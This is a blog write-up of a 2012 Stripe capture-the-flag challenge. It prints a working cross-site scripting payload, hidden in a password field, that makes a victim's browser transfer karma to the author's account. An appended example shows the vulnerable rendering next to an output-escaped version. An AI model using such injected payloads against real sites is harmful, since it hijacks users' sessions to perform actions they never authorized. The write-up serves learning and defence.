Wednesday, August 29, 2012

Stripe CTF Writeup: Challenge 4

This challenge was focused on trying to force the user 'karma_fountain' to send us karma and thus reveal his password. After some deliberation, I decided that trying to hijack the cookie/session was not the point of the challenge. Next I tried to send money from karma_fountain to myself by submitting something from myself, which ended up being a huge waste of time. Since I could not become him or send myself money from him by myself, I had to try to drive his browser and worked on trying to Cross Site Script him. The only thing that I had control of on his site was my password (which was shown to him when I sent him karma). This turns out to be the method through which we can send an XSS attack. My solution is shown below.
    $.ajax({
        type: 'POST',
        url: 'https://level04-4.stripe-ctf.com/user-xlbwayosyx/transfer',
        data: {
            'from': 'karma_fountain',
            'to': 'suntzu_II',
            'amount': '100'
        },
        success: function(msg){
            alert("Winning!");
        }
    });

-- suntzu_II
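
The root cause described above is that the sender's password is written into the recipient's page without output encoding. The following is an added example, not code from the original post or from the challenge application; it shows that rendering step in its vulnerable form beside a hardened form. All function and field names are hypothetical, and the sample record is constructed.

```javascript
// Added example: output-encoding the one attacker-controlled field the
// writeup identifies (the sender's password shown to the recipient).
// Names below are hypothetical, not taken from the challenge source.

// Escape the five characters that can change the HTML parsing context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable form: user-controlled strings are concatenated into markup,
// so a password containing a script element becomes part of the page.
function renderSenderUnsafe(sender) {
  return '<li>' + sender.username + ' (password: ' + sender.password + ')</li>';
}

// Hardened form: every user-controlled value is encoded at output time,
// so the browser displays it as text instead of parsing it as markup.
function renderSenderSafe(sender) {
  return '<li>' + escapeHtml(sender.username) +
         ' (password: ' + escapeHtml(sender.password) + ')</li>';
}

// Returns true when the markup would contain a live script element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample record; the script body is an inert placeholder.
const sampleSender = {
  username: 'suntzu_II',
  password: '<script>/* placeholder */</script>'
};

console.log('unsafe contains script tag:', containsScriptTag(renderSenderUnsafe(sampleSender)));
console.log('safe contains script tag:  ', containsScriptTag(renderSenderSafe(sampleSender)));
console.log(renderSenderSafe(sampleSender));
```
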
